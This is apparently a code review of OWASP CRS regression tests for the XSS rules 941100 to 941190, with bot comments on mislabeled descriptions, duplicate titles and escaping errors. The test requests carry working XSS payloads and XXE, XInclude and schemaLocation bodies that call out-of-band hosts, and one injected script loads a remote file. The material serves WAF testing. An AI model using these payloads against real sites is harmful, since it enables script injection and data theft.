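Review bot: 941100-4 and 941100-5FN reuse the description `XSS testing of libinjection in User-Agent`, although neither puts a payload in User-Agent: 941100-4 sends a benign Referer, and 941100-5FN sends the payload from 941100-1 in Referer. 941100-5FN also asserts `no_log_contains`, so it pins a detection gap, presumably a known false negative given the `FN` suffix. That should be explicit, e.g. `desc: "Known false negative: XSS payload in Referer is not matched by 941100"`, with `desc: Benign Referer must not trigger 941100` for 941100-4. Without that, a later rule change that starts covering Referer will look like a regression instead of an improvement.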


@@ -0,0 +1,23 @@
---
meta:
author: "4v3r9"
enabled: true
name: "941101.yaml"
description: "Test to trigger 941101"
tests:
-
test_title: 941101-1
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Referer: www.github.com<script><img><iframe>
output:
log_contains: id "941101"
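Review bot: The only case in this file has no `desc`, and there is no negative case. Adding `desc: HTML tags appended to the Referer header` documents what 941101-1 sends. A second case with a plain Referer and `no_log_contains: id "941101"` would show that an ordinary Referer does not trigger the rule.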


@@ -0,0 +1,180 @@
---
meta:
author: "csanders-git"
enabled: true
name: "941110.yaml"
description: "Tests to trigger, or not trigger 941110"
tests:
-
test_title: 941110-1
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Cookie: xyz=<script >alert(1);</script>
output:
log_contains: id "941110"
-
test_title: 941110-2
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: "/?x=<script+>alert(1);</script>"
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941110"
-
test_title: 941110-3
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: "&#60;script+&#62;alert(1);&#60;/script&#62;=value"
Host: localhost
output:
log_contains: id "941110"
-
test_title: 941110-4
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Referer: "<script >alert(1);</script>"
output:
log_contains: id "941110"
-
test_title: 941110-5
desc: XSS in URI / PATH_INFO going undetected - GH issue 1022
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: "/foo/bar%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E/"
headers:
Host: localhost
Accept: "*/*"
User-Agent: ModSecurity CRS 3 Tests
output:
log_contains: id "941110"
-
test_title: 941110-6
desc: XSS in payload using %uNNNN
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
uri: /
headers:
Host: localhost
Accept: "*/*"
User-Agent: ModSecurity CRS 3 Tests
Content-Type: application/x-www-form-urlencoded
data:
- var=%uff1cscript%u0020%uff1ealert%281%29%uff1c/script%uff1e
output:
log_contains: id "941110"
-
test_title: 941110-7
desc: XSS in payload with individual code points urlencoded
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
uri: /
headers:
Host: localhost
Accept: "*/*"
User-Agent: ModSecurity CRS 3 Tests
Content-Type: application/x-www-form-urlencoded
data:
- var=%ef%bc%9cscript%20%ef%bc%9ealert%281%29%ef%bc%9c/script%ef%bc%9e
output:
log_contains: id "941110"
-
test_title: 941110-8
desc: XSS in cookie name using unicode
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
Host: localhost
Accept: "*/*"
User-Agent: ModSecurity CRS 3 Tests
Cookie: script alert(1)/script=value
output:
log_contains: id "941110"
-
test_title: 941110-9
desc: XSS in Referer using html entities
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
headers:
Host: localhost
Accept: "*/*"
Referer: "&lt;script+&gt;alert(1);&lt;/script&gt"
output:
log_contains: id "941110"
-
test_title: 941110-10
desc: GH issue 1481
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: "/?%9cscript+%bcalert(1);%bc/script%9e=value"
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
no_log_contains: id "941110"
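Review bot: 941110-8 is described as `XSS in cookie name using unicode`, but as shown here the header is `Cookie: script alert(1)/script=value`, with no angle brackets and no non-ASCII characters. If the file really contains that, the case does not exercise what it describes; if the characters were lost in rendering, the file encoding should be checked and the value quoted so that editors keep it intact. 941110-9 has no `uri` and no User-Agent, and its Referer ends in `&gt` without the closing `;`. A short comment would say whether the unterminated entity is deliberate. Cases 1 to 4 share one description although they target Cookie, a query argument, User-Agent and Referer respectively.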


@@ -0,0 +1,24 @@
---
meta:
author: "Christian S.J. Peron"
description: None
enabled: true
name: 941120.yaml
tests:
-
test_title: 941120-1
desc: "XSS Filter - Category 2: Event Handler Vector"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
method: POST
port: 80
uri: "/?%20%20onload%3d%20=vardata"
#data: "%20%20onload%3d%20=vardata"
version: HTTP/1.0
output:
log_contains: id "941120"
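Review bot: 941120-1 sends `method: POST` with no body, because the `data` line is commented out, so only the argument name in the query string is tested. Either switch to `method: GET` and delete the dead `#data:` line, or restore the body as a second case so both locations are covered. The request also lacks the `User-Agent: ModSecurity CRS 3 Tests` header the sibling files send. The meta `description: None` could be `description: "Tests for rule 941120"`.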


@@ -0,0 +1,309 @@
---
meta:
author: "csanders-git, Christian Folini"
description: "Tests to trigger, or not trigger 941130"
enabled: true
name: 941130.yaml
tests:
-
test_title: 941130-1
desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
output:
log_contains: id "941130"
-
test_title: 941130-2
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % lbsod SYSTEM \x22http://im8vx9fw5e2ibzctphxn9vauwl2m0joncfz5nu.example'||'foo.bar/\x22>%lbsod;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-3
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=<aai xmlns=\x22http://a.b/\x22 xmlns:xsi=\x22http://www.w3.org/2001/XMLSchema-instance\x22 xsi:schemaLocation=\x22http://a.b/ http://c5ipg3yqo8lcutvn8bghsptofflee424qxdq1f.examplefoo.bar/aai.xsd\x22>aai</aai>"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-4
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=abcd'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % cgger SYSTEM \x22http://ved8pm79xruv3c46hup01827oyuzxtlx9qwjk8.example'||'foo.bar/\x22>%cgger;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-5
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=<acp xmlns:xi=\x22http://www.w3.org/2001/XInclude\x22><xi:include href=\x22http://sgc5rj96zows5963jrrx3544qvwtnubvzomfa4.examplefoo.bar/foo\x22/></acp>"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-6
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % grorj SYSTEM \x22http://yikbtpbc1uyy7f89lxt35b6as1yw1qpudm0co1.example'||'foo.bar/\x22>%grorj;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-7
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=<afa xmlns=\x22http://a.b/\x22 xmlns:xsi=\x22http://www.w3.org/2001/XMLSchema-instance\x22 xsi:schemaLocation=\x22http://a.b/ http://2mpfxtfg5y22bjcdp1x79faew52420q0er1hp6.examplefoo.bar/afa.xsd\x22>afa</afa>"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-8
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=<chj xmlns=\x22http://a.b/\x22 xmlns:xsi=\x22http://www.w3.org/2001/XMLSchema-instance\x22 xsi:schemaLocation=\x22http://a.b/ http://1pre0sif8x51eifcs006ceddz45084w4kx7ovd.examplefoo.bar/chj.xsd\x22>chj</chj>"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-9
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=/content.ini'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % dwusu SYSTEM \x22http://ehzrs5as0axe6v7pkdsj4r5qrhxcp6da12osch.example'||'foo.bar/\x22>%dwusu;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-10
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=EmptyValue'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % awpsd SYSTEM \x22http://0cddnr5evws01h2bfzn5zd0cm3sxvrjv7oufi4.example'||'foo.bar/\x22>%awpsd;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-11
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=file:/boot.ini'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % cwtpc SYSTEM \x22http://gvft67ouecbgkxlryf6litjs5jbd5htlhd43ss.example'||'foo.bar/\x22>%cwtpc;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-12
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=Matched Data: <!ENTITY % awfke SYSTEM found within ARGS_NAMES:1'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % awfke SYSTEM \x22http://gj3tu7cu2czg8x9rmful6t7stjzcp4d812osch.example'||'foo.bar/\x22>%awfke;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-13
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=<oez xmlns=\x22http://a.b/\x22 xmlns:xsi=\x22http://www.w3.org/2001/XMLSchema-instance\x22 xsi:schemaLocation=\x22http://a.b/ http://eygr95rshaeenvop1d9jlrmq8hegib6bu4hx5m.examplefoo.bar/oez.xsd\x22>oez</oez>"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-14
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % anwyn SYSTEM \x22http://y98bkp2csupyyfz9cxk3wbxaj1pzuzi26vtohd.example'||'foo.bar/\x22>%anwyn;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-15
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=<vqk xmlns:xi=\x22http://www.w3.org/2001/XInclude\x22><xi:include href=\x22http://749kfyxln3k7toui76fcrksjeak3nybzzsmlaa.examplefoo.bar/foo\x22/></vqk>"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-16
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=2010-01-01'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % fhklu SYSTEM \x22http://fzisa6stibffowpq2eakmsnr9ifhii6mueh45t.example'||'foo.bar/\x22>%fhklu;"
version: HTTP/1.0
output:
log_contains: id "941130"
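Review bot: Cases 941130-2 to 941130-16 all carry `desc: "XSS test for 941130"`, while the payloads fall into three shapes: an `<!ENTITY % … SYSTEM` declaration, an `xsi:schemaLocation` attribute, and an `xi:include` element. Naming the shape in each description, e.g. `desc: "941130: xi:include href in form body"`, would show which one regressed when a case fails. The meta description promises tests "to trigger, or not trigger", but every case asserts `log_contains`; one benign XML-looking body with `no_log_contains` would back that claim. 941130-12 starts its value with `Matched Data: … found within ARGS_NAMES:1`, which looks like a pasted log fragment and deserves a comment if it is intentional.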


@@ -0,0 +1,58 @@
---
meta:
author: "zmallen"
enabled: true
name: "941140.yaml"
description: "Tests to trigger, or not trigger 941130"
tests:
-
test_title: 941140-1
desc: XSS vectors making use of javascript uri and tags, e.g., <p style="background:url(javascript:alert(1))">, in ARGS
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/foo'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: '9411400-1=%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E'
output:
log_contains: id "941140"
-
test_title: 941140-2
desc: XSS vectors making use of javascript uri and tags, e.g., <p style="background:url(javascript:alert(1))">, in ARGS_NAMES
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/bar'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2'
output:
log_contains: id "941140"
-
test_title: 941140-3
desc: XSS vectors making use of javascript uri and tags, e.g., <p style="background:url(javascript:alert(1))">, in COOKIE
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/bar'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Cookie: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2'
output:
log_contains: id "941140"
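Review bot: The `meta.description` of this file names rule 941130 although the file is `941140.yaml` and every test asserts `id "941140"`; it should read `description: "Tests to trigger, or not trigger 941140"`. The Cookie in test 941140-3 also reuses the `941140-2` label, and the body key in 941140-1 is spelled `9411400-1`, which makes a log hit harder to trace back to the test that produced it. All three tests are positive (`log_contains`) only, so this file would not catch a false-positive regression in the rule; a benign `style` value asserted with `no_log_contains` would close that gap.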


@@ -0,0 +1,41 @@
---
meta:
author: "zmallen"
enabled: true
name: "941150.yaml"
description: "Tests to trigger, or not trigger 941150"
tests:
-
test_title: 941150-1
desc: Disallowed HTML entities, ARGS
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/foo'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: '941150-1%3D%3Ca%20href%3D%22test%22'
output:
log_contains: id "941150"
-
test_title: 941150-2
desc: Disallowed HTML entities, ARGS
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
uri: '/'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: "payload=<a href=# language=\"JScript.Encode\" onclick=\"#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@\">XSS</a>"
output:
log_contains: id "941150"
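Review bot: Test 941150-1 is labelled `ARGS`, but its body encodes the `=` separator as `%3D`, so the whole string is likely parsed as a parameter name with an empty value and the test exercises ARGS_NAMES rather than a value. If value coverage is intended, keep the separator literal: `data: '941150-1=%3Ca%20href%3D%22test%22'`. Test 941150-2 carries the same `desc` although it covers a different input (an encoded-script attribute on a POST body), so a distinct description would make a failing case easier to triage.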


@@ -0,0 +1,218 @@
---
meta:
author: "csanders-git, Franziska Bühler"
enabled: true
name: "941160.yaml"
description: "Tests to trigger, or not trigger 941160"
tests:
-
test_title: 941160-1
desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/demo/xss/xml/vuln.xml.php?input=<script+xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)</script>&//'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-2
desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-3
desc: "just another XSS teststring: <x onend="
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3Cx%20onend%3D'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-4
desc: 'just another XSS teststring: "onzoom='
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%22onzoom%3D'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-5
desc: "just another XSS teststring: 'formaction="
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%27formaction%3D'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-6
desc: "just another XSS teststring:< x: script"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3C%20x%3A%20script'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-7
desc: "just another XSS teststring:<f o r m"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=$%3Cf%20o%20r%20m'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-8
desc: "just another XSS teststring: '<f o r m' in User-Agent header"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: "ModSecurity CRS 3 Tests %3Cf%20o%20r%20m"
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-9
desc: "just another XSS teststring: '<f o r m' in Referer header"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
Referer: 'https://coreruleset.org/?%3Cf%20o%20r%20m'
output:
log_contains: id "941160"
-
test_title: 941160-10
desc: "just another XSS teststring: '<f o r m' in Cookie name"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: "ModSecurity CRS 3 Tests %3Cf%20o%20r%20m"
Host: localhost
Cookie: 'PHPSESSID%3Cf%20o%20r%20m=1234'
output:
log_contains: id "941160"
-
test_title: 941160-10
desc: "just another XSS teststring: '<f o r m' in Cookie value"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
Cookie: 'PHPSESSID=1234%3Cf%20o%20r%20m'
output:
log_contains: id "941160"
-
test_title: 941160-11
desc: "just another XSS teststring: '<f o r m' in ARG NAME"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/?foo%3Cf%20o%20r%20m=bar'
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
output:
log_contains: id "941160"
-
test_title: 941160-12
desc: "just another XSS teststring: '<f o r m' in ARG VALUE"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/?foo=bar%3Cf%20o%20r%20m'
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
output:
log_contains: id "941160"
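Review bot: The first `941160-10` test (Cookie name) still sends the marker in `User-Agent` as well, so it passes on the header match alone, as 941160-8 already shows, and would not notice if cookie-name inspection stopped working; the header there should be the clean `User-Agent: "ModSecurity CRS 3 Tests"`. The title `941160-10` is then used a second time for the Cookie value test, which makes results ambiguous when tests are selected or reported by title. Renumber the second one to `941160-11` and shift the two titles that follow.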


@@ -0,0 +1,40 @@
---
meta:
author: "csanders-git"
enabled: true
name: "941170.yaml"
description: "Tests to trigger, or not trigger 941170"
tests:
-
test_title: 941170-1
desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941170"
-
test_title: 941170-2
desc: "XSS test based on portswigger XSS cheatsheet"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
uri: '/'
data: "payload=javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'></a>"
output:
log_contains: id "941170"


@@ -0,0 +1,58 @@
---
meta:
author: "zmallen"
enabled: true
name: "941180.yaml"
description: "Tests to trigger, or not trigger 941180"
tests:
-
test_title: 941180-1
desc: Node-validator blacklist keywords, ARGS
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/foo'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: '941180-1=window.location'
output:
log_contains: id "941180"
-
test_title: 941180-2
desc: Node-validator blacklist keywords, ARGS_NAMES
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/bar'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: 'document.cookie=941180-2'
output:
log_contains: id "941180"
-
test_title: 941180-3
desc: Node-validator blacklist keywords, ARGS_NAMES
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/baz'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Cookie: 'window.location=941180-3'
output:
log_contains: id "941180"
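Review bot: Test 941180-3 is described as `ARGS_NAMES` but places the keyword in the `Cookie` header as a cookie name, so the description does not match the variable under test; `desc: Node-validator blacklist keywords, COOKIES_NAMES` would match the wording used in the 941190 file. Tests 941180-1 and 941180-2 send a `data` body with `method: GET`, so whether that body is inspected presumably depends on the content type the test runner adds. Using `POST`, or moving the parameter into `uri`, would make the ARGS coverage explicit.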


@@ -0,0 +1,58 @@
---
meta:
author: "csanders-git"
enabled: true
name: "941190.yaml"
description: "Tests to trigger, or not trigger 941190"
tests:
-
test_title: 941190-1
desc: Node-validator blacklist keywords, ARGS
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/foo'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: "941190-1=<STYLE>@import'http://xss.rocks/xss.css';</STYLE>"
output:
log_contains: id "941190"
-
test_title: 941190-2
desc: Node-validator blacklist keywords, ARGS_NAMES
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/bar'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
data: "x=<STYLE>@im\\port'\\ja\vasc\\ript:alert('XSS')';</STYLE>"
output:
log_contains: id "941190"
-
test_title: 941190-3
desc: Node-validator blacklist keywords, COOKIES_NAMES
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/baz'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Cookie: '<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>'
output:
log_contains: id "941190"
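Review bot: In test 941190-2 the double-quoted `data` value contains `\v`, which YAML decodes to a vertical-tab character, while every other backslash in the string is written `\\`; the request therefore carries a control character where a literal backslash followed by `v` was presumably intended. Escape it like the rest: `data: "x=<STYLE>@im\\port'\\ja\\vasc\\ript:alert('XSS')';</STYLE>"`. The three `desc` lines also still read "Node-validator blacklist keywords", apparently copied from 941180, although the inputs here are `<STYLE>` import and binding cases.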
